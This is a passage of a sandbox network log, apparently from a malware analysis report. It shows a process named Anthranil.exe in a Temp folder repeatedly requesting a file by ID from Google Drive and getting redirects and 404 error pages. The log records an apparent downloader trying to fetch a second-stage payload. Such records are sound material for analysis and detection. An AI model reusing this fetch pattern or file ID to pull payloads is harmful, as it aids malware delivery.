                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:55 UTC1920INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:55 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Content-Security-Policy: script-src 'nonce-o4lgZjahBgfMMxT65KBQWQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  21192.168.2.449319142.250.185.1294436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:29:55 UTC464OUTGET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:56 UTC1851INHTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgTtEnrvsYf6N4wH7Tn1wvfpdoYW8SZCyEH0v86h4nPr5AInCNFwyEsq1Ry2hn5-Xv1XFzfZ5TY
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:56 GMT
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-LMZkefaX489A_cu248nRag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  2025-01-11 04:29:56 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 65 4d 7a 45 79 49 50 4b 65 53 4d 70 73 38 41 61 6f 73 79 4c 5a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="eMzEyIPKeSMps8AaosyLZQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  22192.168.2.449320216.58.206.464436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:29:57 UTC422OUTGET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:57 UTC1920INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:57 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-s-5qwaaiSOLmPOwwe65-fw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  23192.168.2.449321142.250.185.1294436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:29:58 UTC464OUTGET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:58 UTC1844INHTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgRycPxdjWjyfs3Y3imVnVtWE0QqA965Ya9gWByXQywZCJBI0to3FyO8vZqIw2zN2Lsm
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:58 GMT
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-86CjWbfPz_SJt_iIsI_2VQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  2025-01-11 04:29:58 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 43 42 73 63 4c 68 42 4a 32 54 73 48 4f 72 71 5f 4a 39 71 50 41 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CBscLhBJ2TsHOrq_J9qPAQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  24192.168.2.449322216.58.206.464436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:29:59 UTC422OUTGET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:29:59 UTC1920INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:29:59 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy: script-src 'nonce-ttwc2lfC310U46vHKdCJ6g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  25192.168.2.449323142.250.185.1294436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:30:00 UTC464OUTGET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:30:00 UTC1844INHTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgTfaRMVSdz2I_gQteKH19D_xvJ5MwjHJD7p7nXwhrRrotKW5Yzz2cNADz6XOz7nde1O
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:00 GMT
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Security-Policy: script-src 'nonce-XiBI2Keh8MFdGaBmt9OlbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Content-Length: 1652
                                                                                  Server: UploadServer
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Content-Security-Policy: sandbox allow-scripts
                                                                                  Connection: close
                                                                                  2025-01-11 04:30:00 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 43 6b 37 69 36 4c 77 76 6f 79 5a 6e 4e 50 71 61 54 74 4d 48 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                  Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="TCk7i6LwvoyZnNPqaTtMHw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  26192.168.2.449324216.58.206.464436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:30:01 UTC422OUTGET /uc?export=download&id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR- HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Host: drive.google.com
                                                                                  Cache-Control: no-cache
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:30:02 UTC1920INHTTP/1.1 303 See Other
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:02 GMT
                                                                                  Location: https://drive.usercontent.google.com/download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download
                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                  Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                  Content-Security-Policy: script-src 'nonce-5U-bZ0hDnUxPkfboarEjSw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Cross-Origin-Opener-Policy: same-origin
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  27192.168.2.449325142.250.185.1294436660C:\Users\user\AppData\Local\Temp\Anthranil.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2025-01-11 04:30:02 UTC464OUTGET /download?id=1gJe8HrUci3mdlC7FAElydAx7Cz9GQLR-&export=download HTTP/1.1
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                  Cache-Control: no-cache
                                                                                  Host: drive.usercontent.google.com
                                                                                  Connection: Keep-Alive
                                                                                  Cookie: NID=520=lfxjMNSa5R9mby9jIENf2BvBnUdEKe-wjxo6Jq-Jdk8ycqk9fLUlkDwU3_U3EdL4Vsokz2ux2Ad6bZSyB2qun0nkW1dQYfxbS-XKY_I16B7hhIl-B7Z1gV_l6S1g80O2orWeuHqyoTIx3CxCCerq3arAzIiFmsza25cizYrkvhFSLV7dK4X32qW9h8bb
                                                                                  2025-01-11 04:30:03 UTC1851INHTTP/1.1 404 Not Found
                                                                                  X-GUploader-UploadID: AFIdbgTJn2Lurzj4IBV0yd5RWlijRFGqBXIyYF-wU4Fi3JYtjhdHX7enYZGRNS05WM6MnzBQDJX8ZhI
                                                                                  Content-Type: text/html; charset=utf-8
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Sat, 11 Jan 2025 04:30:03 GMT
                                                                                  Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                  Content-Security-Policy: script-src 'nonce-jEN3criIUTNmSW7MN-8bvg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                  Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                  Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                  Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                  Cross-Origin-Opener-Policy: same-origin
